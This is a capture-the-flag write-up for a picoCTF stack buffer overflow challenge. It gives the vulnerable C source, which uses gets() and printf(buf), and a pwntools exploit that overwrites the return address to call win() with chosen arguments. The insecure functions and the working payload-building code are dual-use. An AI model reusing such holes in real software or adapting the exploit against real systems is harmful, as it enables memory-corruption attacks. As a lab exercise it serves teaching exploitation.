Buffer Overflow 2

#buffer-overflow

Contents

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 100
#define FLAGSIZE 64

void win(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  if (arg1 != 0xCAFEF00D)
    return;
  if (arg2 != 0xF00DF00D)
    return;
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

Solution

from pwn import *
exe = ELF("./vuln")
context.binary = exe

win = p32(0x08049296)
ex = p32(0x08049130)
arg1 = p32(0xCAFEF00D)
arg2 = p32(0xF00DF00D)
offset = b'i' * 0x70

payload = offset + win + ex + arg1 + arg2


if args.REMOTE:
    port = 55803
    target = remote("saturn.picoctf.net", port)
else:
    target = process([exe.path])

target.sendline(payload)
target.recvuntil(b'\xf0\n')
flag = target.recvall().decode("ascii")
target.close()

print()
log.success(flag)
print()